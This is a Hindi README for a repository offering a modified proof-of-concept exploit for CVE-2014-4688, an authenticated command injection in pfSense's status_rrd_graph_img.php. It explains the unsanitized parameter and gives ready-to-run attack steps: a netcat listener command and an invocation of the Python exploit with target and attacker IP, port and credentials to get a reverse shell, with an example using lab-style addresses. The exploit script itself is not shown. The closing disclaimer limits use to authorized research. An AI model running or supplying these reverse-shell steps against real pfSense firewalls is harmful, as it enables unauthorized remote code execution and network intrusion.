
CVE-2014-4688 के लिए संशोधित प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो pfSense status_rrd_graph_img.php में एक कमांड इंजेक्शन भेद्यता है, जो SSL हैंडलिंग के साथ प्रमाणित रिमोट कोड निष्पादन को सक्षम बनाता है।
CVE-2014-4688 के लिए संशोधित Exploit-DB प्रूफ-ऑफ-कॉन्सेप्ट (pfSense status_rrd_graph_img.php कमांड इंजेक्शन)
इस रिपॉजिटरी में CVE-2014-4688 के लिए मूल Exploit-DB प्रूफ-ऑफ-कॉन्सेप्ट का एक संशोधित संस्करण है, जो pfSense संस्करण ≤ 2.1.3 को प्रभावित करता है।
यह कमजोरी status_rrd_graph_img.php घटक के भीतर मौजूद है और database पैरामीटर के अनुचित इनपुट सैनिटाइज़ेशन के कारण प्रमाणित उपयोगकर्ताओं को मनमाने सिस्टम कमांड निष्पादित करने की अनुमति देती है।
status_rrd_graph_img.phpएक प्रमाणित उपयोगकर्ता कमजोर एंडपॉइंट को दिए गए क्राफ्टेड इनपुट के माध्यम से मनमाने शेल कमांड इंजेक्ट कर सकता है।
एक लिसनर शुरू करें:
nc -lvnp <LPORT>
प्रूफ ऑफ कॉन्सेप्ट:
python3 cve-2014-4688.py --rhost <TARGET_IP> --lhost <ATTACKER_IP> --lport <PORT> --username <USERNAME> --password <PASSWORD>
python3 cve-2014-4688.py --rhost 10.129.7.193 --lhost 10.10.15.12 --lport 443 --username Joebloggs --password Password
यह रिपॉजिटरी केवल अधिकृत सुरक्षा अनुसंधान, शिक्षा और नियंत्रित परीक्षण उद्देश्यों के लिए प्रदान की गई है। स्पष्ट अनुमति के बिना सिस्टम के विरुद्ध अनधिकृत उपयोग अवैध और अनैतिक है।